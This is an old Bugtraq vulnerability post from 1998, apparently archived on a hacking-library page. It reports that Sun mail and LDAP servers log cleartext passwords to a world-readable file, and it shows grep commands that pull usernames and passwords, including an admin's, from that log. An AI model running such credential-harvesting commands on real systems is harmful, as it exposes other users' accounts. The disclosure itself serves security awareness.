Date: Fri, 25 Dec 1998 19:51:56 PST
From: Dana Jones 
Reply-To: Bugtraq List 
To: BUGTRAQ@netspace.org
Subject: Vulnerability

SIMS 3.x (Sun Internet Mail Server) and SDS 1.x & 3.1 (Sun LDAP
Directory services) vulnerability.

/var/opt/SUNWconn/ldap/log/slapd.log  is used to log ldap
connects/operations.

I won't waste a lot of typing on detailing the problem, perhaps this
simple example will suffice:

% cd /var/opt/SUNWconn/ldap/log/
% ls -l slapd.log

-rw-rw-rw-   1 root     root       33519 Dec 16 16:00 slapd.log

% grep password slapd.log

Wed Dec 16 12:55 : conn=41 op=2 SRCH base="CN=Joe T. User
(joet),OU=People,O=email,C=US" scope=2 filter="(userpassword=bettysue)"

% grep passwd | grep admin

Wed Dec 16 12:55 : conn=41 op=2 SRCH base="CN=admin
(admin),OU=People,O=email,C=US" scope=2 filter="(userpassword=secret)"


 yes folks, world readable (and writable for that matter) and
clear text passwords and uids of all those folks logging into the IMAP
server to check mail, etc. and on a machine that users can log into.

Almost takes all the fun out of it.

    Source: geocities.com/dharan6/library/hack99

               ( geocities.com/dharan6/library)                   ( geocities.com/dharan6)